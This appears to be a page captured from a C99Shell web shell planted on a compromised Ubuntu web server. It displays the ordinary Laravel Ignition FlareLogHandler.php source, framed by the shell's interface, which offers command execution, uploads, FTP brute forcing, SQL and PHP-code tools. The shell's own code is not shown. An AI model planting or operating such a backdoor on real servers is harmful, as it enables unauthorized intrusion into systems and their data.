!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/queuepro/vendor/spatie/laravel-ignition/src/Support/   drwxrwxr-x
Free 13.09 GB of 57.97 GB (22.57%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     FlareLogHandler.php (2.64 KB)      -rwxrwxr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Spatie\LaravelIgnition\Support;

use 
InvalidArgumentException;
use 
Monolog\Handler\AbstractProcessingHandler;
use 
Monolog\Logger;
use 
Spatie\FlareClient\Flare;
use 
Spatie\FlareClient\Report;
use 
Throwable;

class 
FlareLogHandler extends AbstractProcessingHandler
{
    protected 
Flare $flare;

    protected 
SentReports $sentReports;

    protected 
int $minimumReportLogLevel Logger::ERROR;

    public function 
__construct(Flare $flareSentReports $sentReports$level Logger::DEBUG$bubble true)
    {
        
$this->flare $flare;

        
$this->sentReports $sentReports;

        
parent::__construct($level$bubble);
    }

    public function 
setMinimumReportLogLevel(int $level): void
    
{
        if (! 
in_array($levelLogger::getLevels())) {
            throw new 
InvalidArgumentException('The given minimum log level is not supported.');
        }

        
$this->minimumReportLogLevel $level;
    }

    protected function 
write(array $record): void
    
{
        if (! 
$this->shouldReport($record)) {
            return;
        }
        if (
$this->hasException($record)) {
            
$report $this->flare->report($record['context']['exception']);

            if (
$report) {
                
$this->sentReports->add($report);
            }

            return;
        }

        if (
config('flare.send_logs_as_events')) {
            if (
$this->hasValidLogLevel($record)) {
                
$this->flare->reportMessage(
                    
$record['message'],
                    
'Log ' Logger::getLevelName($record['level']),
                    function (
Report $flareReport) use ($record) {
                        foreach (
$record['context'] as $key => $value) {
                            
$flareReport->context($key$value);
                        }
                    }
                );
            }
        }
    }

    
/**
     * @param array<string, mixed> $report
     *
     * @return bool
     */
    
protected function shouldReport(array $report): bool
    
{
        if (! 
config('flare.key')) {
            return 
false;
        }

        return 
$this->hasException($report) || $this->hasValidLogLevel($report);
    }

    
/**
     * @param array<string, mixed> $report
     *
     * @return bool
     */
    
protected function hasException(array $report): bool
    
{
        
$context $report['context'];

        return isset(
$context['exception']) && $context['exception'] instanceof Throwable;
    }

    
/**
     * @param array<string, mixed> $report
     *
     * @return bool
     */
    
protected function hasValidLogLevel(array $report): bool
    
{
        return 
$report['level'] >= $this->minimumReportLogLevel;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0055 ]--